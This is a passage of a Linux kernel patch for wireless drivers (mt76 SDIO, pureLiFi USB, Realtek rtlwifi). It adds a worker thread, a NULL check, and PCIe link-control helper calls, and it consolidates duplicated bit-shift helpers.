+ 
++	err = mt76_worker_setup(dev->hw, &sdio->stat_worker, mt76s_tx_status_data,
++				"sdio-sta");
++	if (err)
++		return err;
++
+ 	sched_set_fifo_low(sdio->status_worker.task);
+ 	sched_set_fifo_low(sdio->net_worker.task);
+-
+-	INIT_WORK(&sdio->stat_work, mt76s_tx_status_data);
++	sched_set_fifo_low(sdio->stat_worker.task);
+ 
+ 	dev->queue_ops = &sdio_queue_ops;
+ 	dev->bus = bus_ops;
+diff --git a/drivers/net/wireless/purelifi/plfxlc/usb.c b/drivers/net/wireless/purelifi/plfxlc/usb.c
+index 76d0a778636a4..311676c1ece0a 100644
+--- a/drivers/net/wireless/purelifi/plfxlc/usb.c
++++ b/drivers/net/wireless/purelifi/plfxlc/usb.c
+@@ -493,9 +493,12 @@ int plfxlc_usb_wreq_async(struct plfxlc_usb *usb, const u8 *buffer,
+ 			  void *context)
+ {
+ 	struct usb_device *udev = interface_to_usbdev(usb->ez_usb);
+-	struct urb *urb = usb_alloc_urb(0, GFP_ATOMIC);
++	struct urb *urb;
+ 	int r;
+ 
++	urb = usb_alloc_urb(0, GFP_ATOMIC);
++	if (!urb)
++		return -ENOMEM;
+ 	usb_fill_bulk_urb(urb, udev, usb_sndbulkpipe(udev, EP_DATA_OUT),
+ 			  (void *)buffer, buffer_len, complete_fn, context);
+ 
+diff --git a/drivers/net/wireless/realtek/rtlwifi/pci.c b/drivers/net/wireless/realtek/rtlwifi/pci.c
+index ca79f652fef3c..6116c1bec1558 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/pci.c
++++ b/drivers/net/wireless/realtek/rtlwifi/pci.c
+@@ -164,21 +164,29 @@ static bool _rtl_pci_platform_switch_device_pci_aspm(
+ 	struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw));
+ 	struct rtl_hal *rtlhal = rtl_hal(rtl_priv(hw));
+ 
++	value &= PCI_EXP_LNKCTL_ASPMC;
++
+ 	if (rtlhal->hw_type != HARDWARE_TYPE_RTL8192SE)
+-		value |= 0x40;
++		value |= PCI_EXP_LNKCTL_CCC;
+ 
+-	pci_write_config_byte(rtlpci->pdev, 0x80, value);
++	pcie_capability_clear_and_set_word(rtlpci->pdev, PCI_EXP_LNKCTL,
++					   PCI_EXP_LNKCTL_ASPMC | value,
++					   value);
+ 
+ 	return false;
+ }
+ 
+-/*When we set 0x01 to enable clk request. Set 0x0 to disable clk req.*/
+-static void _rtl_pci_switch_clk_req(struct ieee80211_hw *hw, u8 value)
++/* @value is PCI_EXP_LNKCTL_CLKREQ_EN or 0 to enable/disable clk request. */
++static void _rtl_pci_switch_clk_req(struct ieee80211_hw *hw, u16 value)
+ {
+ 	struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw));
+ 	struct rtl_hal *rtlhal = rtl_hal(rtl_priv(hw));
+ 
+-	pci_write_config_byte(rtlpci->pdev, 0x81, value);
++	value &= PCI_EXP_LNKCTL_CLKREQ_EN;
++
++	pcie_capability_clear_and_set_word(rtlpci->pdev, PCI_EXP_LNKCTL,
++					   PCI_EXP_LNKCTL_CLKREQ_EN,
++					   value);
+ 
+ 	if (rtlhal->hw_type == HARDWARE_TYPE_RTL8192SE)
+ 		udelay(100);
+@@ -192,11 +200,8 @@ static void rtl_pci_disable_aspm(struct ieee80211_hw *hw)
+ 	struct rtl_ps_ctl *ppsc = rtl_psc(rtl_priv(hw));
+ 	struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw));
+ 	u8 pcibridge_vendor = pcipriv->ndis_adapter.pcibridge_vendor;
+-	u8 num4bytes = pcipriv->ndis_adapter.num4bytes;
+ 	/*Retrieve original configuration settings. */
+ 	u8 linkctrl_reg = pcipriv->ndis_adapter.linkctrl_reg;
+-	u16 pcibridge_linkctrlreg = pcipriv->ndis_adapter.
+-				pcibridge_linkctrlreg;
+ 	u16 aspmlevel = 0;
+ 	u8 tmp_u1b = 0;
+ 
+@@ -221,16 +226,8 @@ static void rtl_pci_disable_aspm(struct ieee80211_hw *hw)
+ 	/*Set corresponding value. */
+ 	aspmlevel |= BIT(0) | BIT(1);
+ 	linkctrl_reg &= ~aspmlevel;
+-	pcibridge_linkctrlreg &= ~(BIT(0) | BIT(1));
+ 
+ 	_rtl_pci_platform_switch_device_pci_aspm(hw, linkctrl_reg);
+-	udelay(50);
+-
+-	/*4 Disable Pci Bridge ASPM */
+-	pci_write_config_byte(rtlpci->pdev, (num4bytes << 2),
+-			      pcibridge_linkctrlreg);
+-
+-	udelay(50);
+ }
+ 
+ /*Enable RTL8192SE ASPM & Enable Pci Bridge ASPM for
+@@ -245,9 +242,7 @@ static void rtl_pci_enable_aspm(struct ieee80211_hw *hw)
+ 	struct rtl_ps_ctl *ppsc = rtl_psc(rtl_priv(hw));
+ 	struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw));
+ 	u8 pcibridge_vendor = pcipriv->ndis_adapter.pcibridge_vendor;
+-	u8 num4bytes = pcipriv->ndis_adapter.num4bytes;
+ 	u16 aspmlevel;
+-	u8 u_pcibridge_aspmsetting;
+ 	u8 u_device_aspmsetting;
+ 
+ 	if (!ppsc->support_aspm)
+@@ -259,25 +254,6 @@ static void rtl_pci_enable_aspm(struct ieee80211_hw *hw)
+ 		return;
+ 	}
+ 
+-	/*4 Enable Pci Bridge ASPM */
+-
+-	u_pcibridge_aspmsetting =
+-	    pcipriv->ndis_adapter.pcibridge_linkctrlreg |
+-	    rtlpci->const_hostpci_aspm_setting;
+-
+-	if (pcibridge_vendor == PCI_BRIDGE_VENDOR_INTEL)
+-		u_pcibridge_aspmsetting &= ~BIT(0);
+-
+-	pci_write_config_byte(rtlpci->pdev, (num4bytes << 2),
+-			      u_pcibridge_aspmsetting);
+-
+-	rtl_dbg(rtlpriv, COMP_INIT, DBG_LOUD,
+-		"PlatformEnableASPM(): Write reg[%x] = %x\n",
+-		(pcipriv->ndis_adapter.pcibridge_pciehdr_offset + 0x10),
+-		u_pcibridge_aspmsetting);
+-
+-	udelay(50);
+-
+ 	/*Get ASPM level (with/without Clock Req) */
+ 	aspmlevel = rtlpci->const_devicepci_aspm_setting;
+ 	u_device_aspmsetting = pcipriv->ndis_adapter.linkctrl_reg;
+@@ -291,7 +267,8 @@ static void rtl_pci_enable_aspm(struct ieee80211_hw *hw)
+ 
+ 	if (ppsc->reg_rfps_level & RT_RF_OFF_LEVL_CLK_REQ) {
+ 		_rtl_pci_switch_clk_req(hw, (ppsc->reg_rfps_level &
+-					     RT_RF_OFF_LEVL_CLK_REQ) ? 1 : 0);
++					     RT_RF_OFF_LEVL_CLK_REQ) ?
++					     PCI_EXP_LNKCTL_CLKREQ_EN : 0);
+ 		RT_SET_PS_LEVEL(ppsc, RT_RF_OFF_LEVL_CLK_REQ);
+ 	}
+ 	udelay(100);
+@@ -358,22 +335,6 @@ static bool rtl_pci_check_buddy_priv(struct ieee80211_hw *hw,
+ 	return tpriv != NULL;
+ }
+ 
+-static void rtl_pci_get_linkcontrol_field(struct ieee80211_hw *hw)
+-{
+-	struct rtl_pci_priv *pcipriv = rtl_pcipriv(hw);
+-	struct rtl_pci *rtlpci = rtl_pcidev(pcipriv);
+-	u8 capabilityoffset = pcipriv->ndis_adapter.pcibridge_pciehdr_offset;
+-	u8 linkctrl_reg;
+-	u8 num4bbytes;
+-
+-	num4bbytes = (capabilityoffset + 0x10) / 4;
+-
+-	/*Read  Link Control Register */
+-	pci_read_config_byte(rtlpci->pdev, (num4bbytes << 2), &linkctrl_reg);
+-
+-	pcipriv->ndis_adapter.pcibridge_linkctrlreg = linkctrl_reg;
+-}
+-
+ static void rtl_pci_parse_configuration(struct pci_dev *pdev,
+ 					struct ieee80211_hw *hw)
+ {
+@@ -2033,12 +1994,6 @@ static bool _rtl_pci_find_adapter(struct pci_dev *pdev,
+ 		    PCI_SLOT(bridge_pdev->devfn);
+ 		pcipriv->ndis_adapter.pcibridge_funcnum =
+ 		    PCI_FUNC(bridge_pdev->devfn);
+-		pcipriv->ndis_adapter.pcibridge_pciehdr_offset =
+-		    pci_pcie_cap(bridge_pdev);
+-		pcipriv->ndis_adapter.num4bytes =
+-		    (pcipriv->ndis_adapter.pcibridge_pciehdr_offset + 0x10) / 4;
+-
+-		rtl_pci_get_linkcontrol_field(hw);
+ 
+ 		if (pcipriv->ndis_adapter.pcibridge_vendor ==
+ 		    PCI_BRIDGE_VENDOR_AMD) {
+@@ -2055,13 +2010,11 @@ static bool _rtl_pci_find_adapter(struct pci_dev *pdev,
+ 		pdev->vendor, pcipriv->ndis_adapter.linkctrl_reg);
+ 
+ 	rtl_dbg(rtlpriv, COMP_INIT, DBG_DMESG,
+-		"pci_bridge busnumber:devnumber:funcnumber:vendor:pcie_cap:link_ctl_reg:amd %d:%d:%d:%x:%x:%x:%x\n",
++		"pci_bridge busnumber:devnumber:funcnumber:vendor:amd %d:%d:%d:%x:%x\n",
+ 		pcipriv->ndis_adapter.pcibridge_busnum,
+ 		pcipriv->ndis_adapter.pcibridge_devnum,
+ 		pcipriv->ndis_adapter.pcibridge_funcnum,
+ 		pcibridge_vendors[pcipriv->ndis_adapter.pcibridge_vendor],
+-		pcipriv->ndis_adapter.pcibridge_pciehdr_offset,
+-		pcipriv->ndis_adapter.pcibridge_linkctrlreg,
+ 		pcipriv->ndis_adapter.amd_l1_patch);
+ 
+ 	rtl_pci_parse_configuration(pdev, hw);
+diff --git a/drivers/net/wireless/realtek/rtlwifi/pci.h b/drivers/net/wireless/realtek/rtlwifi/pci.h
+index 866861626a0a1..d6307197dfea0 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/pci.h
++++ b/drivers/net/wireless/realtek/rtlwifi/pci.h
+@@ -236,11 +236,6 @@ struct mp_adapter {
+ 	u16 pcibridge_vendorid;
+ 	u16 pcibridge_deviceid;
+ 
+-	u8 num4bytes;
+-
+-	u8 pcibridge_pciehdr_offset;
+-	u8 pcibridge_linkctrlreg;
+-
+ 	bool amd_l1_patch;
+ };
+ 
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/phy.c b/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/phy.c
+index 12d0b3a87af7c..0fab3a0c7d49d 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/phy.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/phy.c
+@@ -16,12 +16,6 @@ static u32 _rtl88e_phy_rf_serial_read(struct ieee80211_hw *hw,
+ static void _rtl88e_phy_rf_serial_write(struct ieee80211_hw *hw,
+ 					enum radio_path rfpath, u32 offset,
+ 					u32 data);
+-static u32 _rtl88e_phy_calculate_bit_shift(u32 bitmask)
+-{
+-	u32 i = ffs(bitmask);
+-
+-	return i ? i - 1 : 32;
+-}
+ static bool _rtl88e_phy_bb8188e_config_parafile(struct ieee80211_hw *hw);
+ static bool _rtl88e_phy_config_mac_with_headerfile(struct ieee80211_hw *hw);
+ static bool phy_config_bb_with_headerfile(struct ieee80211_hw *hw,
+@@ -51,7 +45,7 @@ u32 rtl88e_phy_query_bb_reg(struct ieee80211_hw *hw, u32 regaddr, u32 bitmask)
+ 	rtl_dbg(rtlpriv, COMP_RF, DBG_TRACE,
+ 		"regaddr(%#x), bitmask(%#x)\n", regaddr, bitmask);
+ 	originalvalue = rtl_read_dword(rtlpriv, regaddr);
+-	bitshift = _rtl88e_phy_calculate_bit_shift(bitmask);
++	bitshift = calculate_bit_shift(bitmask);
+ 	returnvalue = (originalvalue & bitmask) >> bitshift;
+ 
+ 	rtl_dbg(rtlpriv, COMP_RF, DBG_TRACE,
+@@ -74,7 +68,7 @@ void rtl88e_phy_set_bb_reg(struct ieee80211_hw *hw,
+ 
+ 	if (bitmask != MASKDWORD) {
+ 		originalvalue = rtl_read_dword(rtlpriv, regaddr);
+-		bitshift = _rtl88e_phy_calculate_bit_shift(bitmask);
++		bitshift = calculate_bit_shift(bitmask);
+ 		data = ((originalvalue & (~bitmask)) | (data << bitshift));
+ 	}
+ 
+@@ -99,7 +93,7 @@ u32 rtl88e_phy_query_rf_reg(struct ieee80211_hw *hw,
+ 
+ 
+ 	original_value = _rtl88e_phy_rf_serial_read(hw, rfpath, regaddr);
+-	bitshift = _rtl88e_phy_calculate_bit_shift(bitmask);
++	bitshift = calculate_bit_shift(bitmask);
+ 	readback_value = (original_value & bitmask) >> bitshift;
+ 
+ 	spin_unlock(&rtlpriv->locks.rf_lock);
+@@ -127,7 +121,7 @@ void rtl88e_phy_set_rf_reg(struct ieee80211_hw *hw,
+ 			original_value = _rtl88e_phy_rf_serial_read(hw,
+ 								    rfpath,
+ 								    regaddr);
+-			bitshift = _rtl88e_phy_calculate_bit_shift(bitmask);
++			bitshift = calculate_bit_shift(bitmask);
+ 			data =
+ 			    ((original_value & (~bitmask)) |
+ 			     (data << bitshift));
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8192c/phy_common.c b/drivers/net/wireless/realtek/rtlwifi/rtl8192c/phy_common.c
+index 3d29c8dbb2559..144ee780e1b6a 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8192c/phy_common.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8192c/phy_common.c
+@@ -17,7 +17,7 @@ u32 rtl92c_phy_query_bb_reg(struct ieee80211_hw *hw, u32 regaddr, u32 bitmask)
+ 	rtl_dbg(rtlpriv, COMP_RF, DBG_TRACE, "regaddr(%#x), bitmask(%#x)\n",
+ 		regaddr, bitmask);
+ 	originalvalue = rtl_read_dword(rtlpriv, regaddr);
+-	bitshift = _rtl92c_phy_calculate_bit_shift(bitmask);
++	bitshift = calculate_bit_shift(bitmask);
+ 	returnvalue = (originalvalue & bitmask) >> bitshift;
+ 
+ 	rtl_dbg(rtlpriv, COMP_RF, DBG_TRACE,
+@@ -40,7 +40,7 @@ void rtl92c_phy_set_bb_reg(struct ieee80211_hw *hw,
+ 
+ 	if (bitmask != MASKDWORD) {
+ 		originalvalue = rtl_read_dword(rtlpriv, regaddr);
+-		bitshift = _rtl92c_phy_calculate_bit_shift(bitmask);
++		bitshift = calculate_bit_shift(bitmask);
+ 		data = ((originalvalue & (~bitmask)) | (data << bitshift));
+ 	}
+ 
+@@ -143,14 +143,6 @@ void _rtl92c_phy_rf_serial_write(struct ieee80211_hw *hw,
+ }
+ EXPORT_SYMBOL(_rtl92c_phy_rf_serial_write);
+ 
+-u32 _rtl92c_phy_calculate_bit_shift(u32 bitmask)
+-{
+-	u32 i = ffs(bitmask);
+-
+-	return i ? i - 1 : 32;
+-}
+-EXPORT_SYMBOL(_rtl92c_phy_calculate_bit_shift);
+-
+ static void _rtl92c_phy_bb_config_1t(struct ieee80211_hw *hw)
+ {
+ 	rtl_set_bbreg(hw, RFPGA0_TXINFO, 0x3, 0x2);
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8192c/phy_common.h b/drivers/net/wireless/realtek/rtlwifi/rtl8192c/phy_common.h
+index 75afa6253ad02..e64d377dfe9e2 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8192c/phy_common.h
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8192c/phy_common.h
+@@ -196,7 +196,6 @@ bool rtl92c_phy_set_rf_power_state(struct ieee80211_hw *hw,
+ void rtl92ce_phy_set_rf_on(struct ieee80211_hw *hw);
+ void rtl92c_phy_set_io(struct ieee80211_hw *hw);
+ void rtl92c_bb_block_on(struct ieee80211_hw *hw);
+-u32 _rtl92c_phy_calculate_bit_shift(u32 bitmask);
+ long _rtl92c_phy_txpwr_idx_to_dbm(struct ieee80211_hw *hw,
+ 				  enum wireless_mode wirelessmode,
+ 				  u8 txpwridx);
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8192ce/phy.c b/drivers/net/wireless/realtek/rtlwifi/rtl8192ce/phy.c
+index da54e51badd3a..fa70a7d5539fd 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8192ce/phy.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8192ce/phy.c
+@@ -39,7 +39,7 @@ u32 rtl92c_phy_query_rf_reg(struct ieee80211_hw *hw,
+ 							       rfpath, regaddr);
+ 	}
+ 
+-	bitshift = _rtl92c_phy_calculate_bit_shift(bitmask);
++	bitshift = calculate_bit_shift(bitmask);
+ 	readback_value = (original_value & bitmask) >> bitshift;
+ 
+ 	spin_unlock(&rtlpriv->locks.rf_lock);
+@@ -110,7 +110,7 @@ void rtl92ce_phy_set_rf_reg(struct ieee80211_hw *hw,
+ 			original_value = _rtl92c_phy_rf_serial_read(hw,
+ 								    rfpath,
+ 								    regaddr);
+-			bitshift = _rtl92c_phy_calculate_bit_shift(bitmask);
++			bitshift = calculate_bit_shift(bitmask);
+ 			data =
+ 			    ((original_value & (~bitmask)) |
+ 			     (data << bitshift));
+@@ -122,7 +122,7 @@ void rtl92ce_phy_set_rf_reg(struct ieee80211_hw *hw,
+ 			original_value = _rtl92c_phy_fw_rf_serial_read(hw,
+ 								       rfpath,
+ 								       regaddr);
+-			bitshift = _rtl92c_phy_calculate_bit_shift(bitmask);
++			bitshift = calculate_bit_shift(bitmask);
+ 			data =
+ 			    ((original_value & (~bitmask)) |
+ 			     (data << bitshift));
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8192ce/phy.h b/drivers/net/wireless/realtek/rtlwifi/rtl8192ce/phy.h
+index 7582a162bd112..c7a0d4c776f0a 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8192ce/phy.h
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8192ce/phy.h
+@@ -94,7 +94,6 @@ u32 _rtl92c_phy_rf_serial_read(struct ieee80211_hw *hw, enum radio_path rfpath,
+ 			       u32 offset);
+ u32 _rtl92c_phy_fw_rf_serial_read(struct ieee80211_hw *hw,
+ 				  enum radio_path rfpath, u32 offset);
+-u32 _rtl92c_phy_calculate_bit_shift(u32 bitmask);
+ void _rtl92c_phy_rf_serial_write(struct ieee80211_hw *hw,
+ 				 enum radio_path rfpath, u32 offset, u32 data);
+ void _rtl92c_phy_fw_rf_serial_write(struct ieee80211_hw *hw,
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8192cu/phy.c b/drivers/net/wireless/realtek/rtlwifi/rtl8192cu/phy.c
+index a8d9fe269f313..0b8cb7e61fd80 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8192cu/phy.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8192cu/phy.c
+@@ -32,7 +32,7 @@ u32 rtl92cu_phy_query_rf_reg(struct ieee80211_hw *hw,
+ 		original_value = _rtl92c_phy_fw_rf_serial_read(hw,
+ 							       rfpath, regaddr);
+ 	}
+-	bitshift = _rtl92c_phy_calculate_bit_shift(bitmask);
++	bitshift = calculate_bit_shift(bitmask);
+ 	readback_value = (original_value & bitmask) >> bitshift;
+ 	rtl_dbg(rtlpriv, COMP_RF, DBG_TRACE,
+ 		"regaddr(%#x), rfpath(%#x), bitmask(%#x), original_value(%#x)\n",
+@@ -56,7 +56,7 @@ void rtl92cu_phy_set_rf_reg(struct ieee80211_hw *hw,
+ 			original_value = _rtl92c_phy_rf_serial_read(hw,
+ 								    rfpath,
+ 								    regaddr);
+-			bitshift = _rtl92c_phy_calculate_bit_shift(bitmask);
++			bitshift = calculate_bit_shift(bitmask);
+ 			data =
+ 			    ((original_value & (~bitmask)) |
+ 			     (data << bitshift));
+@@ -67,7 +67,7 @@ void rtl92cu_phy_set_rf_reg(struct ieee80211_hw *hw,
+ 			original_value = _rtl92c_phy_fw_rf_serial_read(hw,
+ 								       rfpath,
+ 								       regaddr);
+-			bitshift = _rtl92c_phy_calculate_bit_shift(bitmask);
++			bitshift = calculate_bit_shift(bitmask);
+ 			data =
+ 			    ((original_value & (~bitmask)) |
+ 			     (data << bitshift));
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8192de/phy.c b/drivers/net/wireless/realtek/rtlwifi/rtl8192de/phy.c
+index d18c092b61426..d835a27429f0f 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8192de/phy.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8192de/phy.c
+@@ -169,13 +169,6 @@ static const u8 channel_all[59] = {
+ 	157, 159, 161, 163, 165
+ };
+ 
+-static u32 _rtl92d_phy_calculate_bit_shift(u32 bitmask)
+-{
+-	u32 i = ffs(bitmask);
+-
+-	return i ? i - 1 : 32;
+-}
+-
+ u32 rtl92d_phy_query_bb_reg(struct ieee80211_hw *hw, u32 regaddr, u32 bitmask)
+ {
+ 	struct rtl_priv *rtlpriv = rtl_priv(hw);
+@@ -198,7 +191,7 @@ u32 rtl92d_phy_query_bb_reg(struct ieee80211_hw *hw, u32 regaddr, u32 bitmask)
+ 	} else {
+ 		originalvalue = rtl_read_dword(rtlpriv, regaddr);
+ 	}
+-	bitshift = _rtl92d_phy_calculate_bit_shift(bitmask);
++	bitshift = calculate_bit_shift(bitmask);
+ 	returnvalue = (originalvalue & bitmask) >> bitshift;
+ 	rtl_dbg(rtlpriv, COMP_RF, DBG_TRACE,
+ 		"BBR MASK=0x%x Addr[0x%x]=0x%x\n",
+@@ -230,7 +223,7 @@ void rtl92d_phy_set_bb_reg(struct ieee80211_hw *hw,
+ 					dbi_direct);
+ 		else
+ 			originalvalue = rtl_read_dword(rtlpriv, regaddr);
+-		bitshift = _rtl92d_phy_calculate_bit_shift(bitmask);
++		bitshift = calculate_bit_shift(bitmask);
+ 		data = ((originalvalue & (~bitmask)) | (data << bitshift));
+ 	}
+ 	if (rtlhal->during_mac1init_radioa || rtlhal->during_mac0init_radiob)
+@@ -317,7 +310,7 @@ u32 rtl92d_phy_query_rf_reg(struct ieee80211_hw *hw,
+ 		regaddr, rfpath, bitmask);
+ 	spin_lock(&rtlpriv->locks.rf_lock);
+ 	original_value = _rtl92d_phy_rf_serial_read(hw, rfpath, regaddr);
+-	bitshift = _rtl92d_phy_calculate_bit_shift(bitmask);
++	bitshift = calculate_bit_shift(bitmask);
+ 	readback_value = (original_value & bitmask) >> bitshift;
+ 	spin_unlock(&rtlpriv->locks.rf_lock);
+ 	rtl_dbg(rtlpriv, COMP_RF, DBG_TRACE,
+@@ -343,7 +336,7 @@ void rtl92d_phy_set_rf_reg(struct ieee80211_hw *hw, enum radio_path rfpath,
+ 		if (bitmask != RFREG_OFFSET_MASK) {
+ 			original_value = _rtl92d_phy_rf_serial_read(hw,
+ 				rfpath, regaddr);
+-			bitshift = _rtl92d_phy_calculate_bit_shift(bitmask);
++			bitshift = calculate_bit_shift(bitmask);
+ 			data = ((original_value & (~bitmask)) |
+ 				(data << bitshift));
+ 		}
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8192ee/phy.c b/drivers/net/wireless/realtek/rtlwifi/rtl8192ee/phy.c
+index cc0bcaf13e96e..73ef602bfb01a 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8192ee/phy.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8192ee/phy.c
+@@ -16,7 +16,6 @@ static u32 _rtl92ee_phy_rf_serial_read(struct ieee80211_hw *hw,
+ static void _rtl92ee_phy_rf_serial_write(struct ieee80211_hw *hw,
+ 					 enum radio_path rfpath, u32 offset,
+ 					 u32 data);
+-static u32 _rtl92ee_phy_calculate_bit_shift(u32 bitmask);
+ static bool _rtl92ee_phy_bb8192ee_config_parafile(struct ieee80211_hw *hw);
+ static bool _rtl92ee_phy_config_mac_with_headerfile(struct ieee80211_hw *hw);
+ static bool phy_config_bb_with_hdr_file(struct ieee80211_hw *hw,
+@@ -46,7 +45,7 @@ u32 rtl92ee_phy_query_bb_reg(struct ieee80211_hw *hw, u32 regaddr, u32 bitmask)
+ 	rtl_dbg(rtlpriv, COMP_RF, DBG_TRACE,
+ 		"regaddr(%#x), bitmask(%#x)\n", regaddr, bitmask);
+ 	originalvalue = rtl_read_dword(rtlpriv, regaddr);
+-	bitshift = _rtl92ee_phy_calculate_bit_shift(bitmask);
++	bitshift = calculate_bit_shift(bitmask);
+ 	returnvalue = (originalvalue & bitmask) >> bitshift;
+ 
+ 	rtl_dbg(rtlpriv, COMP_RF, DBG_TRACE,
+@@ -68,7 +67,7 @@ void rtl92ee_phy_set_bb_reg(struct ieee80211_hw *hw, u32 regaddr,
+ 
+ 	if (bitmask != MASKDWORD) {
+ 		originalvalue = rtl_read_dword(rtlpriv, regaddr);
+-		bitshift = _rtl92ee_phy_calculate_bit_shift(bitmask);
++		bitshift = calculate_bit_shift(bitmask);
+ 		data = ((originalvalue & (~bitmask)) | (data << bitshift));
+ 	}
+ 
+@@ -92,7 +91,7 @@ u32 rtl92ee_phy_query_rf_reg(struct ieee80211_hw *hw,
+ 	spin_lock(&rtlpriv->locks.rf_lock);
+ 
+ 	original_value = _rtl92ee_phy_rf_serial_read(hw , rfpath, regaddr);
+-	bitshift = _rtl92ee_phy_calculate_bit_shift(bitmask);
++	bitshift = calculate_bit_shift(bitmask);
+ 	readback_value = (original_value & bitmask) >> bitshift;
+ 
+ 	spin_unlock(&rtlpriv->locks.rf_lock);
+@@ -119,7 +118,7 @@ void rtl92ee_phy_set_rf_reg(struct ieee80211_hw *hw,
+ 
+ 	if (bitmask != RFREG_OFFSET_MASK) {
+ 		original_value = _rtl92ee_phy_rf_serial_read(hw, rfpath, addr);
+-		bitshift = _rtl92ee_phy_calculate_bit_shift(bitmask);
++		bitshift = calculate_bit_shift(bitmask);
+ 		data = (original_value & (~bitmask)) | (data << bitshift);
+ 	}
+ 
+@@ -201,13 +200,6 @@ static void _rtl92ee_phy_rf_serial_write(struct ieee80211_hw *hw,
+ 		pphyreg->rf3wire_offset, data_and_addr);
+ }
+ 
+-static u32 _rtl92ee_phy_calculate_bit_shift(u32 bitmask)
+-{
+-	u32 i = ffs(bitmask);
+-
+-	return i ? i - 1 : 32;
+-}
+-
+ bool rtl92ee_phy_mac_config(struct ieee80211_hw *hw)
+ {
+ 	return _rtl92ee_phy_config_mac_with_headerfile(hw);
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8192se/phy.c b/drivers/net/wireless/realtek/rtlwifi/rtl8192se/phy.c
+index aaa004d4d6d0a..0e2b9698088bb 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8192se/phy.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8192se/phy.c
+@@ -14,13 +14,6 @@
+ #include "hw.h"
+ #include "table.h"
+ 
+-static u32 _rtl92s_phy_calculate_bit_shift(u32 bitmask)
+-{
+-	u32 i = ffs(bitmask);
+-
+-	return i ? i - 1 : 32;
+-}
+-
+ u32 rtl92s_phy_query_bb_reg(struct ieee80211_hw *hw, u32 regaddr, u32 bitmask)
+ {
+ 	struct rtl_priv *rtlpriv = rtl_priv(hw);
+@@ -30,7 +23,7 @@ u32 rtl92s_phy_query_bb_reg(struct ieee80211_hw *hw, u32 regaddr, u32 bitmask)
+ 		regaddr, bitmask);
+ 
+ 	originalvalue = rtl_read_dword(rtlpriv, regaddr);
+-	bitshift = _rtl92s_phy_calculate_bit_shift(bitmask);
++	bitshift = calculate_bit_shift(bitmask);
+ 	returnvalue = (originalvalue & bitmask) >> bitshift;
+ 
+ 	rtl_dbg(rtlpriv, COMP_RF, DBG_TRACE, "BBR MASK=0x%x Addr[0x%x]=0x%x\n",
+@@ -52,7 +45,7 @@ void rtl92s_phy_set_bb_reg(struct ieee80211_hw *hw, u32 regaddr, u32 bitmask,
+ 
+ 	if (bitmask != MASKDWORD) {
+ 		originalvalue = rtl_read_dword(rtlpriv, regaddr);
+-		bitshift = _rtl92s_phy_calculate_bit_shift(bitmask);
++		bitshift = calculate_bit_shift(bitmask);
+ 		data = ((originalvalue & (~bitmask)) | (data << bitshift));
+ 	}
+ 
+@@ -160,7 +153,7 @@ u32 rtl92s_phy_query_rf_reg(struct ieee80211_hw *hw, enum radio_path rfpath,
+ 
+ 	original_value = _rtl92s_phy_rf_serial_read(hw, rfpath, regaddr);
+ 
+-	bitshift = _rtl92s_phy_calculate_bit_shift(bitmask);
++	bitshift = calculate_bit_shift(bitmask);
+ 	readback_value = (original_value & bitmask) >> bitshift;
+ 
+ 	spin_unlock(&rtlpriv->locks.rf_lock);
+@@ -191,7 +184,7 @@ void rtl92s_phy_set_rf_reg(struct ieee80211_hw *hw, enum radio_path rfpath,
+ 	if (bitmask != RFREG_OFFSET_MASK) {
+ 		original_value = _rtl92s_phy_rf_serial_read(hw, rfpath,
+ 							    regaddr);
+-		bitshift = _rtl92s_phy_calculate_bit_shift(bitmask);
++		bitshift = calculate_bit_shift(bitmask);
+ 		data = ((original_value & (~bitmask)) | (data << bitshift));
+ 	}
+ 
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/phy.c b/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/phy.c
+index 5323ead30db03..fa1839d8ee55f 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/phy.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/phy.c
+@@ -29,9 +29,10 @@ static void _rtl8821ae_phy_rf_serial_write(struct ieee80211_hw *hw,
+ 					   u32 data);
+ static u32 _rtl8821ae_phy_calculate_bit_shift(u32 bitmask)
+ {
+-	u32 i = ffs(bitmask);
++	if (WARN_ON_ONCE(!bitmask))
++		return 0;
+ 
+-	return i ? i - 1 : 32;
++	return __ffs(bitmask);
+ }
+ static bool _rtl8821ae_phy_bb8821a_config_parafile(struct ieee80211_hw *hw);
+ /*static bool _rtl8812ae_phy_config_mac_with_headerfile(struct ieee80211_hw *hw);*/
